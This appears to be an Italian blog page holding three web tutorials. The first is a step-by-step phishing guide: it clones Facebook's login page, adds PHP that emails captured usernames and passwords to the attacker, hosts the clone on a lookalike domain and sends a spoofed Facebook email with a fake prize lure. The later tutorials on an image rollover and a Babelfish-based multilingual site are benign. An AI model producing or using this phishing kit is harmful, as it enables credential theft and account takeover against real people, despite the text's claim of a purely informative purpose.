Truffare con il Fake Login

Vi è mai capitato di ricevere email  strane e/o sospette di ebay, paypal o altri servizi importanti di e-commerce e pagamenti online ?

Guardate questa email:

Sembra autentica, vero ?

E’ chiaro che è una truffa!

Anche perchè io non sono neanche registrato ad ebay!

Una tecnica diffusissima a cui dovete stare molto attenti è questa:

Si inviano delle fake email ( Che hanno come mittente l’email vera, autentica e ufficiale del servizio per cui ci si vuole spacciare ),

queste fake mail contengono uno “scusante” che ti fanno raggiungere un’indirizzo web dove è riprodotto il sito(Ad esempio Ebay)

esattamente cosi’ com’è e dove c’è un form per loggarsi e l’utente che ci casca inserire i veri username e password, che in realtà vengono

inviati ai truffatori:)

Come fanno i truffatori”?

Per un giorno diventiamo truffatori 🙂

Queste informazioni sono solo per farvi capire e quindi per puro scopo informativo 🙂

Tutto ciò che ci serve è :

– Uno spazio web disponibile

– Un qualsiasi editor html( Meglio se Golive o Dreamweaver)

– Un sito o un programma contenente un servizio di fake mailer.

(Nel nostro caso useremo il mio:

http://www.matteoiammarrone.com/public/modules.php?name=fakemail

)

Fase 1 –  Scegliamo un servizio famoso “Vittima”.

Nel nostro caso scegliamo il famosissimo social network: Facebook

Adesso lo scopo dovrà essere quello di creare una pagina web identica alla pagina web di login di facebook 🙂

Per me che possiedo Adobe Golive è molto semplice, perchè in Adobe Golive è presente una funzione che mi consente di “Scaricare i siti”,

in questo modo: File -> Server -> Download Page, dopodichè inserisco l’indirizzo: http://www.facebook .com e clicco su “Download”.

Adesso modifichiamo l’act del form login di facebook sostituendo nel codice della pagina che abbiamo scaricato:

sostituendo

<form method=”post” action=”http://login.facebook.com/login.php?attempt=0″ name=”menubar_login” id=”menubar_login”>

con

<form method=”post” action=”index.php” name=”menubar_login” id=”menubar_login”>

Ora sviluppiamoci un codice php che ci invii tramite email il contenuto del campo username e password.

Nel caso di facebook, questo codice può andar bene:

<?php

if (isset($_POST[‘pass’])){

$username=$_POST[’email’];

$password=$_POST[‘pass’];

$mail = “miaemail@sadsa.it”; //INSERITE QUI LA VOSTRA EMAIL”

mail($mail, “Nuova vittima!”, “EmailVittima: $username PAssword Vittima: $pass”);

echo “<meta http-equiv=’refresh’ content=’0, url=http://www.facebook.com’/>”;

}
?>

Inserite il codice sovrastante in un punto qualsiasi della pagina che avete scaricato e risalvate la pagina con estensione php.

Adesso  passiamo alla fase 2.

Fase 2 – Connettiamoci via ftp ad un nostro spazio web ( IL massimo sarebbe se è uno spazio web che ha un nome simile a facebook, ad esempio facebook.altervista.org, oppure facebook.net..ecc), una volta connessi all’ftp pubblichiamo il sito “clone” di facebook.

Nel nostro caso lo spazio web sarà: www.matteoiammarrone.com/fbtruffa

Fase 3 – Costruiamo l’email.

Nel nostro caso dobbiamo prendere come modello le vere email inviate dal vero facebook.

Siamo fortunati, visto che le email di facebook sono semplici testi e sostanzialmente non usano html, loghi o simboli particolari.

La nostra email avrà questo “testo piatto”:

Sei uno dei 100.000 utenti selezionati in tutta facebook per tentare di vincere il premio: Utente dell'anno!
Per confermare la tua identità effettua il login a facebook dal link sottostante:
http://www.matteoiammarrone.com/fbtruffa
Grazie,
il team di facebook.
------------
Vuoi specificare quali e-mail ricevere da Facebook? Accedi a:
http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2">http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2
Adesso inviamo il messaggio sovrastante usando questo fake email:
http://www.matteoiammarrone.com/public/modules.php?name=fakemail
Come email vittima inserita l'email di una persona di cui sapete della sua presenza su facebook, come email mittente inserite: noreply@facebookmail.com
:):)
Dopodichè inviate l'email e il giochino e' fatto!
 :)

Semplice image rollover in javascript

Ciao a tutti ragazzi,

quanti di voi avranno avuto bisogno di creare un rollover sul propio sito?

Molti.

Sicuramente il rollover è un bell’effetto dinamico che piace a chi visita il sito.

Ci sono tanti modi ( Si può usare sia il javascript che il css ) ma ce n’è uno che e’ il più semplice in assoluto.

Ecco a voi il codice:

<a href=”#” onmouseover=immagine.src=”immagine.png ”  onmouseout=immagine.src=”immagine_roll.png” >

<img name=”immagine” id=”immagine” src=”immagine.png”/>

</a>

Dove c’è scritto immagine.png inserite l’indirizzo dell’immagine base,

dove c’è scritto immagine_roll.png inserite l’indirizzo dell’immagine da visualizzare al passaggio del mouse.

Potete sostituire anche # con un qualsiasi collegamento.

Clicca qui per vedere un’esempio di utilizzo.

Creare un sito multilingua

Oggi tratteremo un’argomento abbastanza comune: quanti di voi vorrebbero rendere il propio sito multilingua??

Molti, anzi’ moltissimi.

I vantaggi sono che può essere navigato anche da stranieri.

Inseriamo in tutte le pagine del nostro sito web questo codice:

(Se usate un cms inserite questo codice nel common file, cioè in una pagina comune del cms, oppure in ogni singola pagina)

<?php

if ((isset($_GET[‘lang’])) or (isset($_SESSION[‘lang’]))){

session_start(); //USIAMO LA FUNZIONE SESSION_START PER INIZIARE LA SESSIONE DELLA LINGUA

if (isset($_GET[‘lang’])){

$_SESSION[‘lang’] = $_GET[‘lang’]; //Definiamo la sessione

}

$lang = $_SESSION[‘lang’];

$domain = $_SERVER[‘HTTP_HOST’];

  $path = $_SERVER['SCRIPT_NAME'];
  $queryString = $_SERVER['QUERY_STRING'];
  $currenturl = "http://" . $domain . $path . "?" . $queryString;

echo “<meta http-equiv=’refresh’ content=’0, url=http://it.babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=$currenturl&lp=it_$lang’/>”;

}
?>

Il codice sovrastante è il cuore del nostro sistema multilingua, sfruttiamo il traduttore di link di Yahoo(Yahoo Translate), sfruttiamo le sessioni e i get con php.

Adesso arriva la parte “fisica”:

<?php

$domain = $_SERVER[‘HTTP_HOST’];

  $path = $_SERVER['SCRIPT_NAME'];
  $queryString = $_SERVER['QUERY_STRING'];
  $currenturl = "http://" . $domain . $path . "?" . $queryString;

?>

<a href=”<?php echo $currenturl; ?>&lang=it”><img src=”http://www.sailinginitaly.co.uk/images/italian_flag.gif”/></a><a href=”<?php echo $currenturl; ?>&lang=en”><img src=”http://mednet.rm.ingv.it/images/flag_english.gif”/></a>

Copiate ed incollate il codice sovrastante in qualsiasi punto del vostro sito vogliate “mostrare” le bandierine per cambiare lingua.

Le lingue che ho aggiunto di “default” sono italiano e inglese.

Per aggiungere un’altra lingua(es. spagnolo), vi basterà aggiungere questo codice:

<a href=”<?php echo $currenturl; ?>&lang=codicelingua(es.per lo spagnolo è es)”><img src=”urlbandieralingua.gif”/></a>